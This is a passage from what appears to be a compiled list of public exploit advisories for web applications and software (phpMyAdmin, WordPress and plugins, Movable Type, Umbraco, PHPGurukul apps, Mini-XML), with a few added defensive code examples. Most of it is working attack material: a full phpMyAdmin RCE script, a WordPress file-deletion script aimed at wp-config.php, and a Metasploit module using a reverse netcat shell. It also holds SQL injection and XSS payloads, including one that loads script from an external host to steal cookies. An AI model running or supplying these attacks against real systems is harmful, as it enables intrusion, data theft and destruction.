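if __name__ == "__main__":
    db = make_db()
    print("vulnerable, payload in username:", login_vulnerable(db, PAYLOAD, "sqli"))
    print("vulnerable, payload in password:", login_vulnerable(db, "sqli", PAYLOAD))
    print("safe, payload in username:      ", login_safe(db, PAYLOAD, "sqli"))
    print("safe, real credentials:         ", login_safe(db, "teacher1", "S3cret!"))
```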
  12. # Exploit Title: Engineers Online Portal 1.0 - 'id' SQL Injection
      # Exploit Author: Alon Leviev
      # Date: 22-10-2021
      # Category: Web application
      # Vendor Homepage: https://www.sourcecodester.com/php/13115/engineers-online-portal-php.html
      # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/nia_munoz_monitoring_system.zip
      # Version: 1.0
      # Tested on: Kali Linux
      # Vulnerable page: quiz_question.php
      # Vulnerable Parameter: "id"

      Technical description:
      An SQL Injection vulnerability exists in the Engineers Online Portal. An attacker can leverage the vulnerable "id" parameter in the "quiz_question.php" web page in order to manipulate the SQL query performed. As a result he can extract sensitive data from the web server and in some cases use this vulnerability to get remote code execution on the remote web server.

      Steps to exploit:
      1) Navigate to http://localhost/nia_munoz_monitoring_system/quiz_question.php
      2) Insert your payload in the id parameter

      Proof of concept (PoC):
      The following payload will allow you to extract the MySQL server version running on the web server:
      ' union select NULL,NULL,NULL,NULL,NULL,@@version,NULL,NULL,NULL;-- -

      ```
      GET /nia_munoz_monitoring_system/quiz_question.php?id=3%27%20union%20select%20NULL,NULL,NULL,NULL,NULL,@@version,NULL,NULL,NULL--%20- HTTP/1.1
      Host: localhost
      User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
      Accept-Language: en-US,en;q=0.5
      Accept-Encoding: gzip, deflate
      Connection: close
      Cookie: PHPSESSID=3ptqlolbrddvef5a0k8ufb28c9
      Upgrade-Insecure-Requests: 1
      ```
  13. # Exploit Title: WordPress Plugin Media-Tags 3.2.0.2 - Stored Cross-Site Scripting (XSS)
      # Date: 25-10-2021
      # Exploit Author: Akash Rajendra Patil
      # Vendor Homepage: https://wordpress.org/plugins/media-tags/
      # Software Link: www.codehooligans.com/projects/wordpress/media-tags/
      # Version: 3.2.0.2
      # Tested on Windows

      How to reproduce vulnerability:
      1. Install Latest WordPress
      2. Install and activate Media-Tags <= 3.2.0.2
      3. Navigate to Add Table >> add the payload into 'Media Tag Label Fields' and enter the data into the user input field.
      4. Enter the JavaScript payload mentioned below:
         "><img src=x onerror=confirm(document.domain)>
      5. You will observe that the payload is stored in the database; when the same functionality is triggered, the JavaScript payload executes and a pop-up appears.
  14. # Exploit Title: WordPress Plugin Ninja Tables 4.1.7 - Stored Cross-Site Scripting (XSS)
      # Date: 25-10-2021
      # Exploit Author: Akash Rajendra Patil
      # Vendor Homepage: https://wordpress.org/plugins/ninja-tables/
      # Software Link: https://wpmanageninja.com/downloads/ninja-tables-pro-add-on/
      # Version: 4.1.7
      # Tested on Windows

      How to reproduce vulnerability:
      1. Install Latest WordPress
      2. Install and activate Ninja Tables <= 4.1.7
      3. Enter the JavaScript payload mentioned below in the 'Column Name & Add Data' and enter the data into the user input field.
         "><img src=x onerror=confirm(document.domain)>
      4. Then navigate to Table Design.
      5. You will observe that the payload is stored in the database; when the same functionality is triggered, the JavaScript payload executes and a pop-up appears.
  15. # Exploit Title: Wordpress 4.9.6 - Arbitrary File Deletion (Authenticated) (2)
      # Date: 04/08/2021
      # Exploit Author: samguy
      # Vulnerability Discovery By: Slavco Mihajloski & Karim El Ouerghemmi
      # Vendor Homepage: https://wordpress.org
      # Software Link: https://wordpress.org/wordpress-4.9.6.tar.gz
      # Version: 4.9.6
      # Tested on: Linux - Debian Buster (PHP 7.3)
      # Ref : https://blog.ripstech.com/2018/wordpress-file-delete-to-code-execution
      # EDB : EDB-44949
      # CVE : CVE-2018-12895

      ```javascript
      /*
      Usage:
      1. Login to wordpress with privileges of an author
      2. Navigate to Media > Add New > Select Files > Open/Upload
      3. Click Edit > Open Developer Console > Paste this exploit script
      4. Execute the function, eg: unlink_thumb("../../../../wp-config.php")
      */
      function unlink_thumb(thumb) {
          var $nonce_id = document.getElementById("_wpnonce").value
          if (thumb == null) {
              console.log("specify a file to delete")
              return false
          }
          if ($nonce_id == null) {
              console.log("the nonce id is not found")
              return false
          }
          // Step 1: save the attachment with the attacker-chosen "thumb" meta value
          fetch(window.location.href.replace("&action=edit", ""), {
              method: 'POST',
              credentials: 'include',
              headers: {'Content-Type': 'application/x-www-form-urlencoded'},
              body: "action=editattachment&_wpnonce=" + $nonce_id + "&thumb=" + thumb
          })
          .then(function(resp0) {
              if (resp0.redirected) {
                  // Step 2: deleting the attachment unlinks the file named in "thumb"
                  var $del = document.getElementsByClassName("submitdelete deletion").item(0).href
                  if ($del == null) {
                      console.log("Unknown error: could not find the url action")
                      return false
                  }
                  fetch($del, { method: 'GET', credentials: 'include' }).then(function(resp1) {
                      if (resp1.redirected) {
                          console.log("Arbitrary file deletion of " + thumb + " succeeded!")
                          return true
                      } else {
                          console.log("Arbitrary file deletion of " + thumb + " failed!")
                          return false
                      }
                  })
              } else {
                  console.log("Arbitrary file deletion of " + thumb + " failed!")
                  return false
              }
          })
      }
      ```
  16. # Exploit Title: phpMyAdmin 4.8.1 - Remote Code Execution (RCE)
      # Date: 17/08/2021
      # Exploit Author: samguy
      # Vulnerability Discovery By: ChaMd5 & Henry Huang
      # Vendor Homepage: http://www.phpmyadmin.net
      # Software Link: https://github.com/phpmyadmin/phpmyadmin/archive/RELEASE_4_8_1.tar.gz
      # Version: 4.8.1
      # Tested on: Linux - Debian Buster (PHP 7.3)
      # CVE : CVE-2018-12613

      ```python
      #!/usr/bin/env python
      import re, requests, sys

      # check python major version
      if sys.version_info.major == 3:
          import html
      else:
          from six.moves.html_parser import HTMLParser
          html = HTMLParser()

      if len(sys.argv) < 7:
          usage = """Usage: {} [ipaddr] [port] [path] [username] [password] [command]
      Example: {} 192.168.56.65 8080 /phpmyadmin username password whoami"""
          print(usage.format(sys.argv[0], sys.argv[0]))
          exit()

      def get_token(content):
          s = re.search(r'token"\s*value="(.*?)"', content)
          token = html.unescape(s.group(1))
          return token

      ipaddr = sys.argv[1]
      port = sys.argv[2]
      path = sys.argv[3]
      username = sys.argv[4]
      password = sys.argv[5]
      command = sys.argv[6]

      url = "http://{}:{}{}".format(ipaddr, port, path)

      # 1st req: check login page and version
      url1 = url + "/index.php"
      r = requests.get(url1)
      content = r.content.decode('utf-8')
      if r.status_code != 200:
          print("Unable to find the version")
          exit()

      s = re.search(r'PMA_VERSION:"(\d+\.\d+\.\d+)"', content)
      version = s.group(1)
      if version != "4.8.0" and version != "4.8.1":
          print("The target version {} is not exploitable".format(version))
          exit()

      # get 1st token and cookie
      cookies = r.cookies
      token = get_token(content)

      # 2nd req: login
      p = {'token': token, 'pma_username': username, 'pma_password': password}
      r = requests.post(url1, cookies=cookies, data=p)
      content = r.content.decode('utf-8')
      s = re.search(r'logged_in:(\w+),', content)
      logged_in = s.group(1)
      if logged_in == "false":
          print("Authentication failed")
          exit()

      # get 2nd token and cookie
      cookies = r.cookies
      token = get_token(content)

      # 3rd req: execute query (the query text is written into the PHP session file)
      url2 = url + "/import.php"
      # payload
      payload = '''select '<?php system("{}") ?>';'''.format(command)
      p = {'table': '', 'token': token, 'sql_query': payload}
      r = requests.post(url2, cookies=cookies, data=p)
      if r.status_code != 200:
          print("Query failed")
          exit()

      # 4th req: execute payload (local file inclusion of the session file)
      session_id = cookies.get_dict()['phpMyAdmin']
      url3 = url + "/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_{}".format(session_id)
      r = requests.get(url3, cookies=cookies)
      if r.status_code != 200:
          print("Exploit failed")
          exit()

      # get result
      content = r.content.decode('utf-8', errors="replace")
      s = re.search("select '(.*?)\n'", content, re.DOTALL)
      if s != None:
          print(s.group(1))
      ```
  17. # Exploit Title: WordPress Plugin Filterable Portfolio Gallery 1.0 - 'title' Stored Cross-Site Scripting (XSS)
      # Date: 10/25/2021
      # Exploit Author: Murat DEMIRCI (@butterflyhunt3r)
      # Vendor Homepage: http://www.filterable-portfolio.com/
      # Software Link: https://wordpress.org/plugins/fg-gallery/
      # Version: 1.0
      # Tested on : Windows 10

      #Poc:
      1. Install Latest WordPress
      2. Install and activate Filterable Portfolio Gallery 1.0
      3. Open the plugin on the left frame and enter the JavaScript payload mentioned below into the 'title' field, save and preview.
         <img src=x onerror=alert(1)>
      4. You will observe that the payload is stored in the database and the alert is shown on the screen.
  18. # Exploit Title: WordPress Plugin Supsystic Contact Form 1.7.18 - 'label' Stored Cross-Site Scripting (XSS)
      # Date: 10/27/2021
      # Exploit Author: Murat DEMIRCI (@butterflyhunt3r)
      # Vendor Homepage: https://supsystic.com/
      # Software Link: https://wordpress.org/plugins/contact-form-by-supsystic/
      # Version: 1.7.18
      # Tested on : Windows 10

      #Poc:
      1. Install Latest WordPress
      2. Install and activate the plugin.
      3. Open the plugin, click "Add New Form" and select any form.
      4. Click the "Fields" tab and "Add New Field". Choose whatever you want.
      5. Inject the JavaScript payload mentioned below into the 'label' field, save, and the alert will appear on the screen.
      Payload : <img src=x onerror=alert(1)>
  19. # Exploit Title: PHPGurukul Hostel Management System 2.1 - Cross-site request forgery (CSRF) to Cross-site Scripting (XSS)
      # Date: 2021-10-27
      # Exploit Author: Anubhav Singh
      # Vendor Homepage: https://phpgurukul.com/
      # Software Link: https://phpgurukul.com/hostel-management-system/
      # Version: V 2.1
      # Vulnerable endpoint: http://localhost/hostel/hostel/my-profile.php
      # Tested on Windows 10, XAMPP

      Steps to reproduce:
      1) Navigate to http://localhost/hostel/hostel/my-profile.php
      2) Enter the XSS payload "><script src=https://anubhav1403.xss.ht></script> in the name field
      3) Click on Update Profile and intercept the request in Burp Suite
      4) Generate a CSRF PoC of Update Profile
      ```
      <html>
        <body>
        <script>history.pushState('', '', '/')</script>
          <form action="http://localhost/hostel/hostel/my-profile.php" method="POST">
            <input type="hidden" name="regno" value="123456" />
            <input type="hidden" name="fname" value=""><script&#32;src&#61;https&#58;&#47;&#47;anubhav1403&#46;xss&#46;ht><&#47;script>" />
            <input type="hidden" name="mname" value="Hello" />
            <input type="hidden" name="lname" value="Singh" />
            <input type="hidden" name="gender" value="male" />
            <input type="hidden" name="contact" value="12345678995" />
            <input type="hidden" name="email" value="anubhav&#64;gmail&#46;com" />
            <input type="hidden" name="update" value="Update&#32;Profile" />
            <input type="submit" value="Submit request" />
          </form>
          <script>
            document.forms[0].submit();
          </script>
        </body>
      </html>
      ```
      5) Send this PoC to the victim
      6) When the victim opens the PoC, his/her name is updated to our XSS payload and the payload fires.
      7) Now the attacker gets the victim's details, such as IP address, cookies, etc.
      8) So the attacker is able to steal the victim's cookies successfully!! Account takeover!!!

      #POC
      https://ibb.co/jVcZxnt
      https://ibb.co/DwGh4x9
  20. # Exploit Title: Umbraco v8.14.1 - 'baseUrl' SSRF
      # Date: July 5, 2021
      # Exploit Author: NgoAnhDuc
      # Vendor Homepage: https://our.umbraco.com/
      # Software Link: https://our.umbraco.com/download/releases/8141
      # Version: v8.14.1
      # Affect: Umbraco CMS v8.14.1, Umbraco Cloud

      Vulnerable code:
      Umbraco.Web.Editors.HelpController.GetContextHelpForPage():
      https://github.com/umbraco/Umbraco-CMS/blob/710ecf2537a8630d00db793877d5c169c5cf8095/src/Umbraco.Web/Editors/HelpController.cs#L14
      Umbraco.Web.Editors.DashboardController.GetRemoteDashboardContent():
      https://github.com/umbraco/Umbraco-CMS/blob/710ecf2537a8630d00db793877d5c169c5cf8095/src/Umbraco.Web/Editors/DashboardController.cs#L50
      Umbraco.Web.Editors.DashboardController.GetRemoteDashboardCss():
      https://github.com/umbraco/Umbraco-CMS/blob/710ecf2537a8630d00db793877d5c169c5cf8095/src/Umbraco.Web/Editors/DashboardController.cs#L91

      PoC:
      /umbraco/BackOffice/Api/Help/GetContextHelpForPage?section=content&tree=undefined&baseUrl=https://SSRF-HOST.EXAMPLE
      /umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardContent?section=TryToAvoidGetCacheItem111&baseUrl=https://SSRF-HOST.EXAMPLE/
      /umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardCss?section=AvoidGetCacheItem&baseUrl=https://SSRF-HOST.EXAMPLE/

      Notes:
      - There's no "/" suffix in payload 1
      - "/" suffix is required in payload 2 and payload 3
      - "section" parameter value must be changed each exploit attempt
  21. ```text
      # Exploit Title: WebCTRL OEM 6.5 - 'locale' Reflected Cross-Site Scripting (XSS)
      # Date: 4/07/2021
      # Exploit Author: 3ndG4me
      # Vendor Homepage: https://www.automatedlogic.com/en/products/webctrl-building-automation-system/
      # Version: 6.5 and Below
      # CVE : CVE-2021-31682
      ```

      --Summary--

      The login portal for the Automated Logic WebCTRL/WebCTRL OEM web application contains a vulnerability that allows for reflected XSS attacks due to the operatorlocale GET parameter not being sanitized.

      Automated Logic: https://www.automatedlogic.com/en/products-services/webctrl-building-automation-system/

      --Affects--

      - WebCTRL OEM - Versions 6.5 and prior

      --Details--

      The login portal for the Automated Logic WebCTRL/WebCTRL OEM web application contains a vulnerability that allows for reflected XSS attacks due to the operatorlocale GET parameter not being sanitized. This issue impacts versions 6.5 and below.

      This issue works by passing a basic XSS payload to a vulnerable GET parameter that is reflected in the output without sanitization. This can allow for several issues, including but not limited to:

      - Hijacking a user's session
      - Using XSS payloads to capture input (keylogging)

      --Proof of Concept--

      The following URL parameter was impacted and can be exploited with the sample payload provided below:

      - https://example.com/index.jsp?operatorlocale=en/><script>alert("xss")</script>

      --Mitigation--

      Sanitize any user-controlled input in both form fields and URL parameters to properly encode data so it is not rendered as arbitrary HTML/JavaScript.

      --Timeline--

      - 4/07/2021: XSS vulnerability was discovered and documented.
      - 4/17/2021: A temporary CVE identifier was requested from MITRE. Automated Logic was also notified with the full details of each finding via their product security contact at https://www.automatedlogic.com/en/about/security-commitment/. A baseline 90-day disclosure timeline was established in the initial communication.
      - 7/23/2021: MITRE assigns CVE ID CVE-2021-31682 to the vulnerability.
      - 9/08/2021: Automated Logic formally responds requesting the CVE identifier and states that the issue should be patched in newer versions of the product.
      - 10/20/2021: The researcher responds with the CVE identifier and a request for all impacted version numbers so they can release a more accurate list of impacted products when full disclosure occurs. Automated Logic responds with a list of impacted versions the same day, and the researcher publicly discloses the issue and submits a CVE details update request to MITRE.
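A locale parameter is one of the easiest inputs to defend, because the set of legitimate values is tiny and known in advance. Added example, not WebCTRL's code: the two layers the mitigation above calls for, in Python, applied to the `operatorlocale` value. Validation maps the parameter onto an allowlist of supported locales (the list is an assumption for the example), so the sample payload never reaches a template; output encoding then covers whatever is echoed back into an HTML attribute.

```python
import html
import re

# Locales the login page actually ships (an assumption for this example;
# WebCTRL's real list is not on the page).
SUPPORTED_LOCALES = ("en", "en_US", "de", "fr", "ja")
DEFAULT_LOCALE = "en"
# Shape of a legitimate tag: language plus optional region, e.g. en, en_US, en-GB
LOCALE_SHAPE = re.compile(r"^[a-z]{2,3}(?:[_-][a-z]{2,4})?$", re.IGNORECASE)


def select_locale(raw):
    """Layer 1, validation: map the operatorlocale parameter onto a known locale.
    Anything that is not a plain tag, such as 'en/><script>...</script>', falls back
    to the default, so the payload is discarded before any rendering happens."""
    if raw is None:
        return DEFAULT_LOCALE
    candidate = raw.strip().replace("-", "_")
    if not LOCALE_SHAPE.match(candidate):
        return DEFAULT_LOCALE
    for loc in SUPPORTED_LOCALES:
        if loc.lower() == candidate.lower():
            return loc          # return the canonical spelling, not the user's
    return DEFAULT_LOCALE


def encode_for_html_attribute(value):
    """Layer 2, output encoding: what the template must do with any value it echoes,
    even a validated one, when placing it inside a quoted HTML attribute."""
    return html.escape(value, quote=True)


def render_locale_field(raw):
    """Hidden form field carrying the locale back to the server, built with both layers."""
    return '<input type="hidden" name="operatorlocale" value="%s">' % (
        encode_for_html_attribute(select_locale(raw)))
```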
  22. ```ruby
      class MetasploitModule < Msf::Exploit::Remote
        Rank = NormalRanking

        include Msf::Exploit::Remote::HttpClient

        def initialize(info = {})
          super(update_info(info,
            'Name'           => "Movable Type XMLRPC API Remote Command Injection",
            'Description'    => %q{
              This module exploits the Movable Type XMLRPC API remote command injection.
            },
            'License'        => MSF_LICENSE,
            'Author'         => [
              'Etienne Gervais',        # author & msf module
              'Charl-Alexandre Le Brun' # author & msf module
            ],
            'References'     => [
              ['CVE', '2021-20837'],
              ['URL', 'https://movabletype.org/'],
              ['URL', 'https://nemesis.sh/']
            ],
            'DefaultOptions' => {
              'SSL' => false,
            },
            'Platform'       => ['linux'],
            'Arch'           => ARCH_CMD,
            'Privileged'     => false,
            'DisclosureDate' => "2021-10-20",
            'DefaultTarget'  => 0,
            'Targets'        => [
              [
                'Automatic (Unix In-Memory)',
                {
                  'Platform'       => 'unix',
                  'Arch'           => ARCH_CMD,
                  'Type'           => :unix_memory,
                  'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_netcat' }
                }
              ]
            ]
          ))

          register_options(
            [
              Opt::RPORT(80),
              OptString.new('TARGETURI', [true, 'The URI of the MovableType', '/cgi-bin/mt/'])
            ], self.class
          )
        end

        # Wraps the command in Perl backticks, base64-encodes it and embeds it as the
        # single <base64> parameter of an mt.handler_to_coderef XML-RPC call.
        def cmd_to_xml(cmd, opts = {})
          base64_cmd = Rex::Text.encode_base64("`" + cmd + "`")
          xml_body = <<~THISSTRING
            <?xml version="1.0" encoding="UTF-8"?>
            <methodCall>
              <methodName>mt.handler_to_coderef</methodName>
              <params>
                <param>
                  <value>
                    <base64>
                      #{base64_cmd}
                    </base64>
                  </value>
                </param>
              </params>
            </methodCall>
          THISSTRING
          xml_body
        end

        def check
          begin
            fingerprint = Rex::Text.rand_text_alpha(32)
            command_payload = cmd_to_xml("echo " + fingerprint)
            res = send_request_cgi({
              'method' => 'POST',
              'uri'    => normalize_uri(target_uri.path, 'mt-xmlrpc.cgi'),
              'ctype'  => 'text/xml; charset=UTF-8',
              'data'   => command_payload
            })
            fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
            fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected HTTP response code: #{res.code}") if res.code != 200
            # The server's Perl error message echoes the evaluated command output back.
            if res && res.body.include?("Can't locate " + fingerprint)
              return Exploit::CheckCode::Vulnerable
            end
          rescue ::Rex::ConnectionError
            fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
          end

          Exploit::CheckCode::Safe
        end

        def exploit
          begin
            command_payload = cmd_to_xml(payload.raw)
            res = send_request_cgi({
              'method' => 'POST',
              'uri'    => normalize_uri(target_uri.path, 'mt-xmlrpc.cgi'),
              'ctype'  => 'text/xml; charset=UTF-8',
              'data'   => command_payload
            })
          rescue ::Rex::ConnectionError
            fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
          end
        end
      end
      ```
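The module's request has a fixed shape: a POST to `mt-xmlrpc.cgi` whose `methodName` is `mt.handler_to_coderef` and whose one `<base64>` parameter decodes to a backtick-wrapped command. Added example, not part of the module or of Movable Type: a Python detector that a WAF rule or log pipeline could run over captured POST bodies, flagging both the method name and Perl shell-evaluation markers in decoded arguments. The sample request body is constructed here with a harmless echo command.

```python
import base64
import re
import xml.etree.ElementTree as ET

# The method the module above calls; no ordinary XML-RPC client has a reason to invoke it.
SUSPICIOUS_METHODS = frozenset({"mt.handler_to_coderef"})
# Perl backtick / qx() evaluation markers, which the module wraps around its command.
SHELL_EVAL = re.compile(r"`|\bqx\s*[{(\[/]")


def parse_xmlrpc(body):
    """Return (methodName, [string params]); <base64> params are decoded, <string> taken as-is."""
    root = ET.fromstring(body)
    method = (root.findtext("methodName") or "").strip()
    params = []
    for value in root.iterfind("./params/param/value"):
        b64 = value.findtext("base64")
        if b64 is not None:
            params.append(base64.b64decode(b64.strip()).decode("utf-8", "replace"))
        else:
            params.append((value.findtext("string") or value.text or "").strip())
    return method, params


def classify_request(uri, body):
    """Alerts for one POST to the XML-RPC endpoint (empty list means nothing noted)."""
    if not uri.lower().endswith("mt-xmlrpc.cgi"):
        return []
    try:
        method, params = parse_xmlrpc(body)
    except ET.ParseError:
        return ["malformed XML-RPC body"]
    alerts = []
    if method in SUSPICIOUS_METHODS:
        alerts.append(f"call to {method}")
    for p in params:
        if SHELL_EVAL.search(p):
            alerts.append(f"shell evaluation marker in argument: {p!r}")
    return alerts


# Constructed request body in the shape cmd_to_xml above produces (harmless echo command).
SAMPLE_BODY = f"""<?xml version="1.0" encoding="UTF-8"?>
<methodCall>
  <methodName>mt.handler_to_coderef</methodName>
  <params><param><value><base64>
    {base64.b64encode(b'`echo test`').decode()}
  </base64></value></param></params>
</methodCall>"""

# Constructed benign call for comparison.
BENIGN_BODY = '<?xml version="1.0"?><methodCall><methodName>mt.supportedMethods</methodName><params/></methodCall>'
```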
  23. ```text
      # Exploit Title: Dynojet Power Core 2.3.0 - Unquoted Service Path
      # Exploit Author: Pedro Sousa Rodrigues (https://www.0x90.zone/ / @Pedro_SEC_R)
      # Version: 2.3.0 (Build 303)
      # Date: 30.10.2021
      # Vendor Homepage: https://www.dynojet.com/
      # Software Link: https://docs.dynojet.com/Document/18762
      # Tested on: Windows 10 Version 21H1 (OS Build 19043.1320)
      ```

      ```text
      SERVICE_NAME: DJ.UpdateService
              TYPE               : 10  WIN32_OWN_PROCESS
              START_TYPE         : 3   DEMAND_START
              ERROR_CONTROL      : 1   NORMAL
              BINARY_PATH_NAME   : C:\Program Files\Dynojet Power Core\DJ.UpdateService.exe
              LOAD_ORDER_GROUP   :
              TAG                : 0
              DISPLAY_NAME       : DJ.UpdateService
              DEPENDENCIES       :
              SERVICE_START_NAME : LocalSystem
      ```

      ```text
      PS C:\Users\Developer> Get-UnquotedService

      ServiceName    : DJ.UpdateService
      Path           : C:\Program Files\Dynojet Power Core\DJ.UpdateService.exe
      ModifiablePath : @{ModifiablePath=C:\; IdentityReference=NT AUTHORITY\Authenticated Users; Permissions=AppendData/AddSubdirectory}
      StartName      : LocalSystem
      AbuseFunction  : Write-ServiceBinary -Name 'DJ.UpdateService' -Path <HijackPath>
      CanRestart     : True
      Name           : DJ.UpdateService

      ServiceName    : DJ.UpdateService
      Path           : C:\Program Files\Dynojet Power Core\DJ.UpdateService.exe
      ModifiablePath : @{ModifiablePath=C:\; IdentityReference=NT AUTHORITY\Authenticated Users; Permissions=System.Object[]}
      StartName      : LocalSystem
      AbuseFunction  : Write-ServiceBinary -Name 'DJ.UpdateService' -Path <HijackPath>
      CanRestart     : True
      Name           : DJ.UpdateService
      ```

      #Exploit:
      A successful attempt would require the local user to be able to insert their code in the system root path (depending on the installation path). The service might be executed manually by any authenticated user. If successful, the local user's code would execute with the elevated privileges of Local System.
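For a defender the two questions are which services store an unquoted path with spaces, and which directories must therefore deny write access to ordinary users. Added example, not part of the advisory: a Python check that parses `sc qc` style output, flags an unquoted image path, derives the directories whose ACLs need auditing (the `C:\` that PowerUp reports above is one of them), and prints the `sc config` line that stores the path quoted. The `sc qc` text is constructed from the listing.

```python
import re

# Constructed `sc qc` output modelled on the listing above (not captured from a real host).
SAMPLE_SC_QC = """\
SERVICE_NAME: DJ.UpdateService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\\Program Files\\Dynojet Power Core\\DJ.UpdateService.exe
        SERVICE_START_NAME : LocalSystem
"""

def parse_sc_qc(text):
    """Map each FIELD of `sc qc` output to its value."""
    fields = {}
    for line in text.splitlines():
        m = re.match(r"\s*([A-Z_]+)\s*:\s*(.*)$", line)
        if m:
            fields[m.group(1)] = m.group(2).strip()
    return fields

def image_path(binary_path):
    """Executable part of BINARY_PATH_NAME: the quoted token, or the text up to the first .exe."""
    p = binary_path.strip()
    if p.startswith('"'):
        return p[1:p.find('"', 1)]
    m = re.match(r"(.*?\.exe)(?:\s|$)", p, re.IGNORECASE)
    return m.group(1) if m else p

def is_unquoted_with_spaces(binary_path):
    """True when the image path is stored without quotes and contains a space."""
    return not binary_path.strip().startswith('"') and " " in image_path(binary_path)

def directories_to_audit(path):
    """Parent directory of every truncated name Windows may probe before the real one
    (C:\\Program, C:\\Program Files\\Dynojet, ...); each must deny write/append to non-admins."""
    dirs = set()
    for i, ch in enumerate(path):
        if ch == " ":
            parent = path[:i].rsplit("\\", 1)[0]
            dirs.add(parent + "\\" if parent.endswith(":") else parent)
    return sorted(dirs)

def remediation_command(service_name, path):
    """`sc config` line that re-stores the path quoted (inner quotes escaped for cmd.exe)."""
    return f'sc config {service_name} binPath= "\\"{path}\\""'

if __name__ == "__main__":
    svc = parse_sc_qc(SAMPLE_SC_QC)
    exe = image_path(svc["BINARY_PATH_NAME"])
    print("audit write ACLs on:", directories_to_audit(exe))
    print("fix:", remediation_command(svc["SERVICE_NAME"], exe))
```

On a real host feed `sc qc <service>` output into `parse_sc_qc`; the printed `sc config` line needs an administrative prompt to apply.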
  24. ```text
      # Exploit Title: Mini-XML 3.2 - Heap Overflow
      # Google Dork: mxml Mini-xml Mini-XML
      # Date: 2020.10.19
      # Exploit Author: LIWEI
      # Vendor Homepage: https://www.msweet.org/mxml/
      # Software Link: https://github.com/michaelrsweet/mxml
      # Version: v3.2
      # Tested on: ubuntu 18.04.2
      ```

      1. Compile the Mini-XML code to a library using the compile line `clang -g -O0 -fno-omit-frame-pointer -gline-tables-only -fsanitize=address -fsanitize-address-use-after-scope -fsanitize=fuzzer-no-link`.
      2. Compile my testcase and link them into a binary using the compile line `clang -g -O0 -fno-omit-frame-pointer -gline-tables-only -fsanitize=address -fsanitize-address-use-after-scope -fsanitize=fuzzer`. In my testcase, I use the API "mxmlLoadString" to parse a string.
      3. Run the binary for a short time and it crashes, because "mxml_string_getc" didn't verify the string's length and caused a buffer overflow.
      4. Here is the crash backtrace:

      ```text
      =================================================================
      ==6265==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x612000000a73 at pc 0x000000558e2d bp 0x7ffe13e2caa0 sp 0x7ffe13e2ca98
      READ of size 1 at 0x612000000a73 thread T0
          #0 in mxml_string_getc /opt/mnt/software/mxml32/mxml-file.c:2422:13
          #1 in mxml_load_data /opt/mnt/software/mxml32/mxml-file.c:1558:20
          #2 in mxmlLoadString /opt/mnt/software/mxml32/mxml-file.c:180:11
          #3 in LLVMFuzzerTestOneInput /opt/mnt/software/mxml32/mxml_fuzzer.cpp:12:8
          #4 in fuzzer::Fuzzer::ExecuteCallback(unsigned char const*, unsigned long) (/opt/mnt/software/mxml32/a.out+0x42f357)
          #5 in fuzzer::RunOneTest(fuzzer::Fuzzer*, char const*, unsigned long) (/opt/mnt/software/mxml32/a.out+0x41f7ea)
          #6 in fuzzer::FuzzerDriver(int*, char***, int (*)(unsigned char const*, unsigned long)) (/opt/mnt/software/mxml32/a.out+0x42a7b0)
          #7 in main (/opt/mnt/software/mxml32/a.out+0x41d4b2)
          #8 in __libc_start_main /build/glibc-S9d2JN/glibc-2.27/csu/../csu/libc-start.c:310
          #9 in _start (/opt/mnt/software/mxml32/a.out+0x41d529)
      ```

      6. Here is my testcase:

      ```cpp
      #include <assert.h>
      #include <cstddef>
      #include <cstdint>
      #include <cstdlib>
      #include <string>
      #include <vector>

      #include "mxml.h"

      // libFuzzer entry point: treat the fuzzer-provided bytes as an XML document,
      // parse it with Mini-XML, serialise the tree back to a string and free everything.
      extern "C" int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size)
      {
        std::string  c(reinterpret_cast<const char *>(data), size);
        char        *ptr;
        mxml_node_t *tree;

        tree = mxmlLoadString(NULL, c.c_str(), MXML_NO_CALLBACK);
        if (tree)
        {
          ptr = mxmlSaveAllocString(tree, MXML_NO_CALLBACK);
          if (!ptr)
            assert(false);
          free(ptr);          // mxmlSaveAllocString returns a malloc'd buffer
          mxmlDelete(tree);
        }
        return 0;
      }
      ```
  25. ```text
      # Title: Employee Record Management System 1.2 - 'empid' SQL injection (Unauthenticated)
      # Exploit Author: Anubhav Singh
      # Date: 2021-10-31
      # Vendor Homepage: https://phpgurukul.com/employee-record-management-system-in-php-and-mysql/
      # Version: 1.2
      # Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=8967
      # Tested On: Windows 10, XAMPP
      # Vulnerable Parameter: Email
      ```

      Steps to Reproduce:

      1) Navigate to http://localhost/employee_record/erms/forgetpassword.php, enter any email in the email field and capture the request in Burp Suite.
      2) Create a txt file and paste this request.

      Request:

      ```http
      POST /employee_record/erms/forgetpassword.php HTTP/1.1
      Host: localhost
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
      Accept-Language: en-US,en;q=0.5
      Accept-Encoding: gzip, deflate
      Content-Type: application/x-www-form-urlencoded
      Content-Length: 110
      Origin: http://localhost
      Connection: close
      Referer: http://localhost/employee_record/erms/forgetpassword.php
      Cookie: security_level=0; PHPSESSID=7u3nsaok3or5a9199no8ion8fh
      Upgrade-Insecure-Requests: 1
      Sec-Fetch-Dest: document
      Sec-Fetch-Mode: navigate
      Sec-Fetch-Site: same-origin
      Sec-Fetch-User: ?1

      [email protected]&empid=ads'+AND+(SELECT+9312+FROM+(SELECT(SLEEP([SLEEPTIME])))MBeq)--+NIlX&submit=reset
      ```

      3) Send this request to sqlmap
      4) Command: `python sqlmap.py -r request.txt -p Email --dbs`
      5) We can retrieve all databases using the above sqlmap command